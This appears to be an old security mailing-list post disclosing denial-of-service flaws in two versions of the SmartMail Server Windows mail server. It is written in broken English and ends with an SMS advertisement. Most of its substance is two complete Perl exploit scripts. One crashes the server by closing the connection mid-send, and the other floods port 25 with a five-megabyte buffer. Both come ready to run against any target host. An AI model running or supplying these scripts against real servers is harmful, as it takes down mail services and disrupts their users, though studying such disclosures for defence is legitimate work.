hi SmartMail Server ( http://www.virtualzone.de/smartmail/)is a full featured E-Mail Server. It can be run on any 32Bit compatible Microsoft Windows machine and complies with the standards of SMTP, POP3 and HTTP (Webinterface). SmartMail proposes two version of SmartMail server, I found that two versions were vulnerable has an attack DOS 1- SmartMail Server 2.0 Interim Build 83: the closing of connection during sends dated causes one is necessary "Access violatio at address 0046CBCC i module 'smartsvr.exe' write of address 76756f4e " that is exactly the same vulnerability which I have decouvert concerning popwerft and the exploit has the same effect on the two softwares expoit : #!/usr/bin/perl -w # greetz: marocit and #crack.fr (christal) # securma@caramail.com use Socket; if (not $ARGV[0]) { print qq~ Usage: sm.pl <host> ~; exit;} $ip=$ARGV[0]; print "SmartMail server 2.0 DoS\n\n"; print "Sending Exploit Code to host: " . $ip . "\n\n"; sendexplt("MASSINE"); sub sendexplt { my ($pstr)=@_; $target= inet_aton($ip) || die("inet_aton problems"); socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp') ||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,25,$target)){ select(S); $|=1; print $pstr; sleep 3; close(S); } else { die("Can't connect...\n"); } } 2-SmartMail Server 1.0 BETA 10 :sends it 5MG of dated with port 25 or 110 causes the shutdown of all the services (pop/smtp/webinterface) exploit: #!/usr/bin/perl -w # tool smartdos.pl # securma@caramail.com # Greetz: marocit and #crack.fr (specialement christal.) # use IO::Socket; if ($#ARGV<0) { print "\n write the target IP!\n\n"; exit; } $buffer = "A"x 5099999 ; $connect = IO::Socket::INET ->new (Proto=>"tcp", PeerAddr=> "$ARGV[0]", PeerPort=>"25"); unless ($connect) { die "cant connect $ARGV [0]" } print $connect "$buffer"; print "\nsending exploit......\n\n"; securma@caramail.com _________________________________________________________ Gagne une PS2 ! Envoie un SMS avec le code PS au 61166 (0,35€ Hors coût du SMS)
